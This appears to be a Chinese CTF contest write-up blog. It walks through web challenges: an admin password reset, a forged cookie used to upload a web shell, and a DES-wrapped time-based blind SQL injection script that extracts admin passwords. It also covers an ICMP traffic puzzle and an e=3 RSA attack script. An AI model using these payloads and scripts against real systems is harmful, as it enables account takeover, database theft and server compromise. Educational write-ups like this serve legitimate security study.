Altm4nz's blog

WEB划水选手

网络空间安全技术大赛

WEB

web1

任意注册登录后,发现改密码的功能,
存在漏洞,抓包修改后改修改admin密码。
登陆admin账户,发现img目录可读,

http://117.34.117.216/img/img726849685.jpg
发现是flag

web2

.git泄露源码,利用githack恢复。
index.php被加密,查看upload.php
构造cookie上传shell

1
in_adminid=1,in_adminname=admin,in_adminpassword=1,in_permission=2,in_adminexpire=00e81e7d738c221945959d19c56cb33d

利用菜刀连接,找到fl4g.php

1
PM9SCREW	†><Þî6o=‘®vD&©Ú?“LéXhpUòüM­ãÌósÂãL33CýRí¬¢½S2rœ<’2óxÒ7oä].º

也被加密 找到SCREW解密工具https://github.com/firebroo/screw_decode.git
解密后得到flag{7cb3d823105433606ccac8fb75aed67c}

web3

跳转到QQ空间,抓包看一到一个url
访问拿到一个JS文件,解混淆后审计,找到关键代码

1
2
3
4
5
6
7
8
9
$.ajax({
url:'/f701fee85540b78d08cb276d14953d58',
type:'POST',
dataType:'json',
data: "data="+encodeURIComponent(encryptByDES($('#loginform').serialize(),key)),
error:function(er){
window.location.href='https://qzone.qq.com';
}
})

在ip,hrUW3PG7mp3RLd3dJu,LxMzAX2jog9Bpjs07jP可能存在注入。
首先模拟JS上的加密,JS上使用的是一个标准的DES的ECB模式加密,在python中利用pyDes库重现加密过程
然后进行时间盲注。
脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import pyDes 
import base64
import requests
import urllib
url='http://45.76.49.10:8001/f701fee85540b78d08cb276d14953d58'
flag=''


def des_ecb_encode(source, key):
des_obj = pyDes.des(key.encode('utf-8'), pyDes.ECB, IV=None, pad=None, padmode=pyDes.PAD_PKCS5)
des_result = des_obj.encrypt(source)
return (des_result)

key="MiaoMiao"
for i in range(1,100):
for j in (33,127):
#message="ip=1.1.1.1&hrUW3PG7mp3RLd3dJu=1',if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin'),%d,1))=%d),sleep(5),1))#&LxMzAX2jog9Bpjs07jP="%(i,j)
#message="ip=1.1.1.1&hrUW3PG7mp3RLd3dJu=1',if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))=%d),sleep(5),1))#&LxMzAX2jog9Bpjs07jP="%(i,j)
message="ip=1.1.1.1&hrUW3PG7mp3RLd3dJu=1',if((ascii(substr((select group_concat(password) from admin),%d,1))=%d),sleep(5),1))#&LxMzAX2jog9Bpjs07jP="%(i,j)
code = des_ecb_encode(message, key)
pay= (base64.b64encode(code))
data={
'data':(pay)
}

try:
r=requests.post(url=url,data=data,timeout=4)
except:
flag+= chr(j)
print flag
break
#admin,users
#username,password
#flag{73ad1744f38b68ece51076c7ac77621b}

misc

misc3

发现ICMP中的流量相似,仔细观察后发现每个请求都有两个字母不同,
按时间线排序拼接后拿到flag{RyHgbCf5OhFEiyJnlt9c8ASP}

RSA2

e=3,典型低指数攻击。直接附上脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import gmpy

c=80256065280425989347153660555632253204654757632704797390559450985825600409910703812294413750536361555897348650491697548574007864446117693097103136799284683292648287334023253488891301144881769557674366138889636475162525325855368132832237345279798028008137655682278413635753791609965810603989005785747744993045461207072415730041608172272077090225741385971

n=27262030738190162906068533309218248319312037416856794814532459866130196673561833084739048171769479893806671499522643803412108279907223895517897969906253626028270289028646596897429641138913001561947557784840311014399973312098056896539904624036584153785225626096007313018814076860235378686567457599895712604364100507424939342862464483596795761725357279364545154915110900098124905389351969357103586063992040096368146580315262263546850581515833590884397726108478477798668261762306189036525841356592859315437201733146083995028221597538824801113980100295046731791678895520928441645173205511865657977068061078456941189550383
e=3
i=0
while 1:
if gmpy.root((c+i*n),e)[1]==1:
print "success"
m=gmpy.root((c+i*n),e)[0]
print m
print i
break
i=i+1

print m

然后16进制转文本得到 my password is: I_Lov5_RSA_Rel6te7_me8sagE_aTTacK